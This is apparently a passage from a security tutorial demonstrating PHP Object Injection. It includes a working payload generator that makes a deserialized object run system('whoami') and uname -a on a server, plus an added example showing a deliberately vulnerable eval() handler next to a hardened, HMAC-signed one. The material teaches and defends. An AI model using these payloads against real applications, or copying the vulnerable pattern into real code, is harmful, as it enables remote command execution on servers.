The following steps demonstrate PHP Object Injection:
- Here, we have an app that passes serialized data in a GET parameter (r) and feeds it straight to unserialize():
- Since we have the source code, we can see that the class is named PHPObjectInjection and implements the __wakeup() magic method, which PHP calls automatically whenever unserialize() reconstructs an object of that class:
- Now we can write code that declares a class with the same name and property, so that serializing it produces an object whose property carries the command we want the server to execute:
<?php
// Same class name and property name as the target application; the method
// bodies do not matter here because serialize() only writes out data.
class PHPObjectInjection{
// The PHP code we want __wakeup() on the server to evaluate
public $inject = "system('whoami');";
}
$obj = new PHPObjectInjection;
// Print the serialized representation to use as the r parameter
var_dump(serialize($obj));
?>
- We save the code as a PHP file and run it, which gives us the serialized output:
- We pass this output in the r parameter (URL-encoding it, since it contains quotes, braces and semicolons) and the response shows the user the web server runs as:
- Let's try one more command, uname -a. We generate the payload with the same PHP code, changing only the command inside $inject:
- And we paste the output in the URL:
- Now we see the command being executed and the output is as follows:
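To make both sides of the procedure above concrete, here is an added example (not the chapter's code) that puts the attacker's payload generator next to a reconstructed vulnerable handler and a hardened one. The chapter does not show the application's source, so the body of __wakeup() (an eval() of the inject property), the handler names, and the server-side key are assumptions.

```php
<?php
// Added example, not code from the chapter. The class body, the eval() in
// __wakeup() and the handler functions are assumptions that reproduce the
// pattern described: unserialize() on the r parameter instantiates
// PHPObjectInjection, and its __wakeup() runs attacker-controlled PHP.

class PHPObjectInjection
{
    public $inject;

    // PHP calls this automatically when unserialize() rebuilds an instance,
    // before the application code ever touches the object.
    public function __wakeup()
    {
        eval($this->inject);
    }
}

// --- Attacker side: build the payload offline ---------------------------
// Only the class name and property name must match the server's class;
// the serialized form carries data, not code, so method bodies are irrelevant.
function buildPayload(string $cmd): string
{
    $obj = new PHPObjectInjection();
    $obj->inject = 'system(' . var_export($cmd, true) . ');';
    return serialize($obj);
}

// --- Vulnerable handler: what the server does with ?r=... ---------------
function vulnerableHandler(string $r): void
{
    unserialize($r);   // __wakeup() fires here -> command execution
}

// --- Hardened handler ---------------------------------------------------
// Two controls, both applied:
//  1. Input is "<hmac>.<payload>" and the HMAC must verify (hash_equals is
//     constant-time), so a forged serialized string is rejected outright.
//  2. allowed_classes => false makes unserialize() yield
//     __PHP_Incomplete_Class objects instead of real instances, so no
//     __wakeup()/__destruct() gadget can run even if step 1 is bypassed.
// Where possible, prefer JSON for untrusted state: it never instantiates objects.
function hardenedHandler(string $r, string $key): ?array
{
    $parts = explode('.', $r, 2);
    if (count($parts) !== 2) {
        return null;                       // unsigned input: refuse it
    }
    [$mac, $payload] = $parts;
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) {
        return null;                       // tampered input: refuse it
    }
    $data = unserialize($payload, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

// Demo: web requests replaced by direct calls
$payload = buildPayload('whoami');
echo $payload, PHP_EOL;
echo 'URL-encoded for the r parameter: ?r=', urlencode($payload), PHP_EOL;

// vulnerableHandler($payload);   // would execute `whoami` on the server

$key = 'server-side-secret';       // assumption: never sent to the client
$legit = serialize(['user' => 'guest']);
$signed = hash_hmac('sha256', $legit, $key) . '.' . $legit;
var_dump(hardenedHandler($signed, $key));    // the legitimate array
var_dump(hardenedHandler($payload, $key));   // NULL: forged payload rejected
```

Run it with `php` from the command line. buildPayload('whoami') produces the same serialized string as the chapter's snippet, O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}, where the numbers are the byte lengths of the class name, property name and value; if you hand-edit a payload, those lengths must be updated or unserialize() will fail. Note that the second control alone is not a full fix: an attacker who can still reach unserialize() with arbitrary strings may be able to trigger resource exhaustion or rely on gadgets in other code paths, which is why the signature check comes first.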